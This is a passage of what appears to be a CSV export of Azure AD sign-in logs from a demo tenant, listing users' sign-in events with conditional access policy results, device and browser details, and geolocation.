'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:21,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",db91dc04-4e1d-4696-94f9-efcee8ce1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,db91dc04-4e1d-4696-94f9-efcee8ce1200,SigninLogs,Sucess,41.90428925,-85.99833679
+2107,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:10.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,933b4ae9-9885-42eb-8576-4efcc3ea46f6,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:21,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",52a6664f-09a1-41b6-959f-775d85241000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,52a6664f-09a1-41b6-959f-775d85241000,SigninLogs,Sucess,41.90428925,-85.99833679
+2108,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:34.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7fd1845f-813b-4263-bbf5-ecbc83d1c64d,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:44,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",f4c49c86-cb9e-4a04-9dcc-1dcdedce1000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,f4c49c86-cb9e-4a04-9dcc-1dcdedce1000,SigninLogs,Sucess,41.90428925,-85.99833679
+2109,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:35.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,9dfa91f5-fc0d-4fbf-bd7c-91735b2771b8,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:21,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",5f11d930-41ca-43a7-b362-f3ce9e121100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.""}",Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,5f11d930-41ca-43a7-b362-f3ce9e121100,SigninLogs,Failed,41.90428925,-85.99833679
+2110,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:50.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,aec4fc6c-4062-4ab9-9a80-546b567d42db,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:21,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5f11d930-41ca-43a7-b362-f3ced7141100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,5f11d930-41ca-43a7-b362-f3ced7141100,SigninLogs,Sucess,33.7984581,-84.38828278
+2111,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:07.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8a53e6cb-0709-4636-ae62-7b98121bb101,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:21,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",f680c335-bc78-44a8-8570-4543ce2f1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,f680c335-bc78-44a8-8570-4543ce2f1100,SigninLogs,Sucess,41.90428925,-85.99833679
+2112,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:05.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0e2ea043-9ecf-4dfc-943c-df7b260c3281,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:21,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",1fc6d415-116e-44c9-a4fc-b8ef58221100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,1fc6d415-116e-44c9-a4fc-b8ef58221100,SigninLogs,Sucess,41.90428925,-85.99833679
+2113,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:53.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5c4893bf-4460-457a-b78b-f3504f5d836a,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:13,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",1dbd81fd-18f7-4582-ba72-d8f217851300,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,1dbd81fd-18f7-4582-ba72-d8f217851300,SigninLogs,Sucess,50.6406517,5.572050095
+2114,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,22:18.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,fd77595c-5ff4-418b-8ea6-e0f1b04e9438,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': 